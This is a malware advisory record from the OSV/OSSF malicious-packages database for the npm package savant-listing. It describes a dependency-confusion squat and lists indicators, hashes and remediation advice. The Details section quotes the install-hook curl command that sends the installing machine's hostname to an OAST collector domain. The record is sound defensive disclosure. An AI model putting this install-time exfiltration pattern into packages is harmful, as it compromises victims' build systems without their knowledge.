MAL-2026-5401

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/savant-listing/MAL-2026-5401.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5401
Aliases
  • GHSA-j69h-7gg8-2fxp
  • GHSA-j9c7-3gvf-x8xg
Published
2026-06-09T16:05:25Z
Modified
2026-09-01T11:40:30Z
Summary
Malicious code in savant-listing (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (7360e78a5c5d56ea9323cde1f41e33ce8cc6b625034ef82d067bbfeafee60461)

savant-listing@999.9.9 is a dependency-confusion squat. package.json declares both install and postinstall lifecycle scripts that run curl https://d8fnie486mdq306lb5kgttwrnhxwj33g5.oast.online/info/?hostname=$(hostname), unconditionally exfiltrating the installer host's hostname to an out-of-band interaction (OAST/interactsh) collector on every npm install. The version 999.9.9 and description SAFE PoC - Demonstrates dependency confusion are consistent with a package published to the public registry to win version resolution over an internal package of the same name on victim build systems. The destination is a transient, attacker-controlled OAST subdomain not associated with any legitimate publisher; the harm fires automatically at install time without any user interaction.

Source: ghsa-malware (befc4b6c8bee229433c06811eeb7fe724778cc25ec9fccef9811242168fc2e2b)

Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-004961",
            "import_time": "2026-06-09T16:59:44.63530747Z",
            "modified_time": "2026-06-09T16:06:10Z",
            "sha256": "2d6b7c657fc5ab0647f053b2eea71bebc1d720e7a70abf0316323af2a9d849aa",
            "source": "amazon-inspector",
            "versions": [
                "999.9.10"
            ]
        },
        {
            "id": "IN-MAL-2026-004956",
            "import_time": "2026-06-09T16:59:44.341667267Z",
            "modified_time": "2026-06-09T16:05:25Z",
            "sha256": "518fb2425e398b68afc0ced11b5ccf24fbcab3aae9c831b1a34a830c941f5963",
            "source": "amazon-inspector",
            "versions": [
                "999.9.9"
            ]
        },
        {
            "id": "IN-MAL-2026-004955",
            "import_time": "2026-06-09T16:59:44.240310521Z",
            "modified_time": "2026-06-09T16:05:25Z",
            "sha256": "7360e78a5c5d56ea9323cde1f41e33ce8cc6b625034ef82d067bbfeafee60461",
            "source": "amazon-inspector",
            "versions": [
                "999.9.9"
            ]
        },
        {
            "id": "IN-MAL-2026-004962",
            "import_time": "2026-06-09T16:59:44.695269124Z",
            "modified_time": "2026-06-09T16:06:10Z",
            "sha256": "972304a7ce9c3b67c976d03f4c2769d33ec68e2ff01b358a8ab374793c7ce078",
            "source": "amazon-inspector",
            "versions": [
                "999.9.10"
            ]
        },
        {
            "id": "GHSA-j69h-7gg8-2fxp",
            "import_time": "2026-08-17T04:43:14.260165Z",
            "modified_time": "2026-08-14T10:38:15Z",
            "sha256": "befc4b6c8bee229433c06811eeb7fe724778cc25ec9fccef9811242168fc2e2b",
            "source": "ghsa-malware",
            "versions": [
                "999.9.10",
                "999.9.9"
            ]
        },
        {
            "id": "RLMA-2026-06482",
            "import_time": "2026-09-01T11:17:34.410169225Z",
            "modified_time": "2026-08-24T17:09:57Z",
            "sha256": "be92cc94f1c3cc2d4424424f03a43e187ab4deb11a3a49078d2d370cd5afdf8c",
            "source": "reversing-labs",
            "versions": [
                "999.9.9",
                "999.9.10"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / savant-listing

Package

Name
savant-listing
View open source insights on deps.dev
Purl
pkg:npm/savant-listing

Affected ranges

Affected versions

999.*
999.9.9
999.9.10

Database specific

cwes
[
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    },
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    },
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    }
]
indicators
{
    "domains": [
        "d8fnie486mdq306lb5kgttwrnhxwj33g5.oast.online"
    ],
    "evidence_files": [
        {
            "path": "package.json",
            "sha256": "a4c0237994ad97ad0dab04882a231e78076c22632c9f04b395a1f2943decd18a",
            "tlsh": "abe0617045108e3336d802a17c66950f9852fb2b041d9c544feb154d971d336117d317"
        }
    ],
    "package_integrity": [
        {
            "filename": "savant-listing-999.9.10.tgz",
            "hashes": {
                "sha1": "80788d649ee21b6a0bd0fd9d536f0bc3fa1d9b96",
                "sha512_sri": "sha512-ekMuvz54s6MjpQOMjogc55GS8OiQ/ZLo9E+siMG9vJi31LzICYyCwLV7XhUxaYuufkIkHgKrjr93YdVuiu7KyQ=="
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/savant-listing/MAL-2026-5401.json"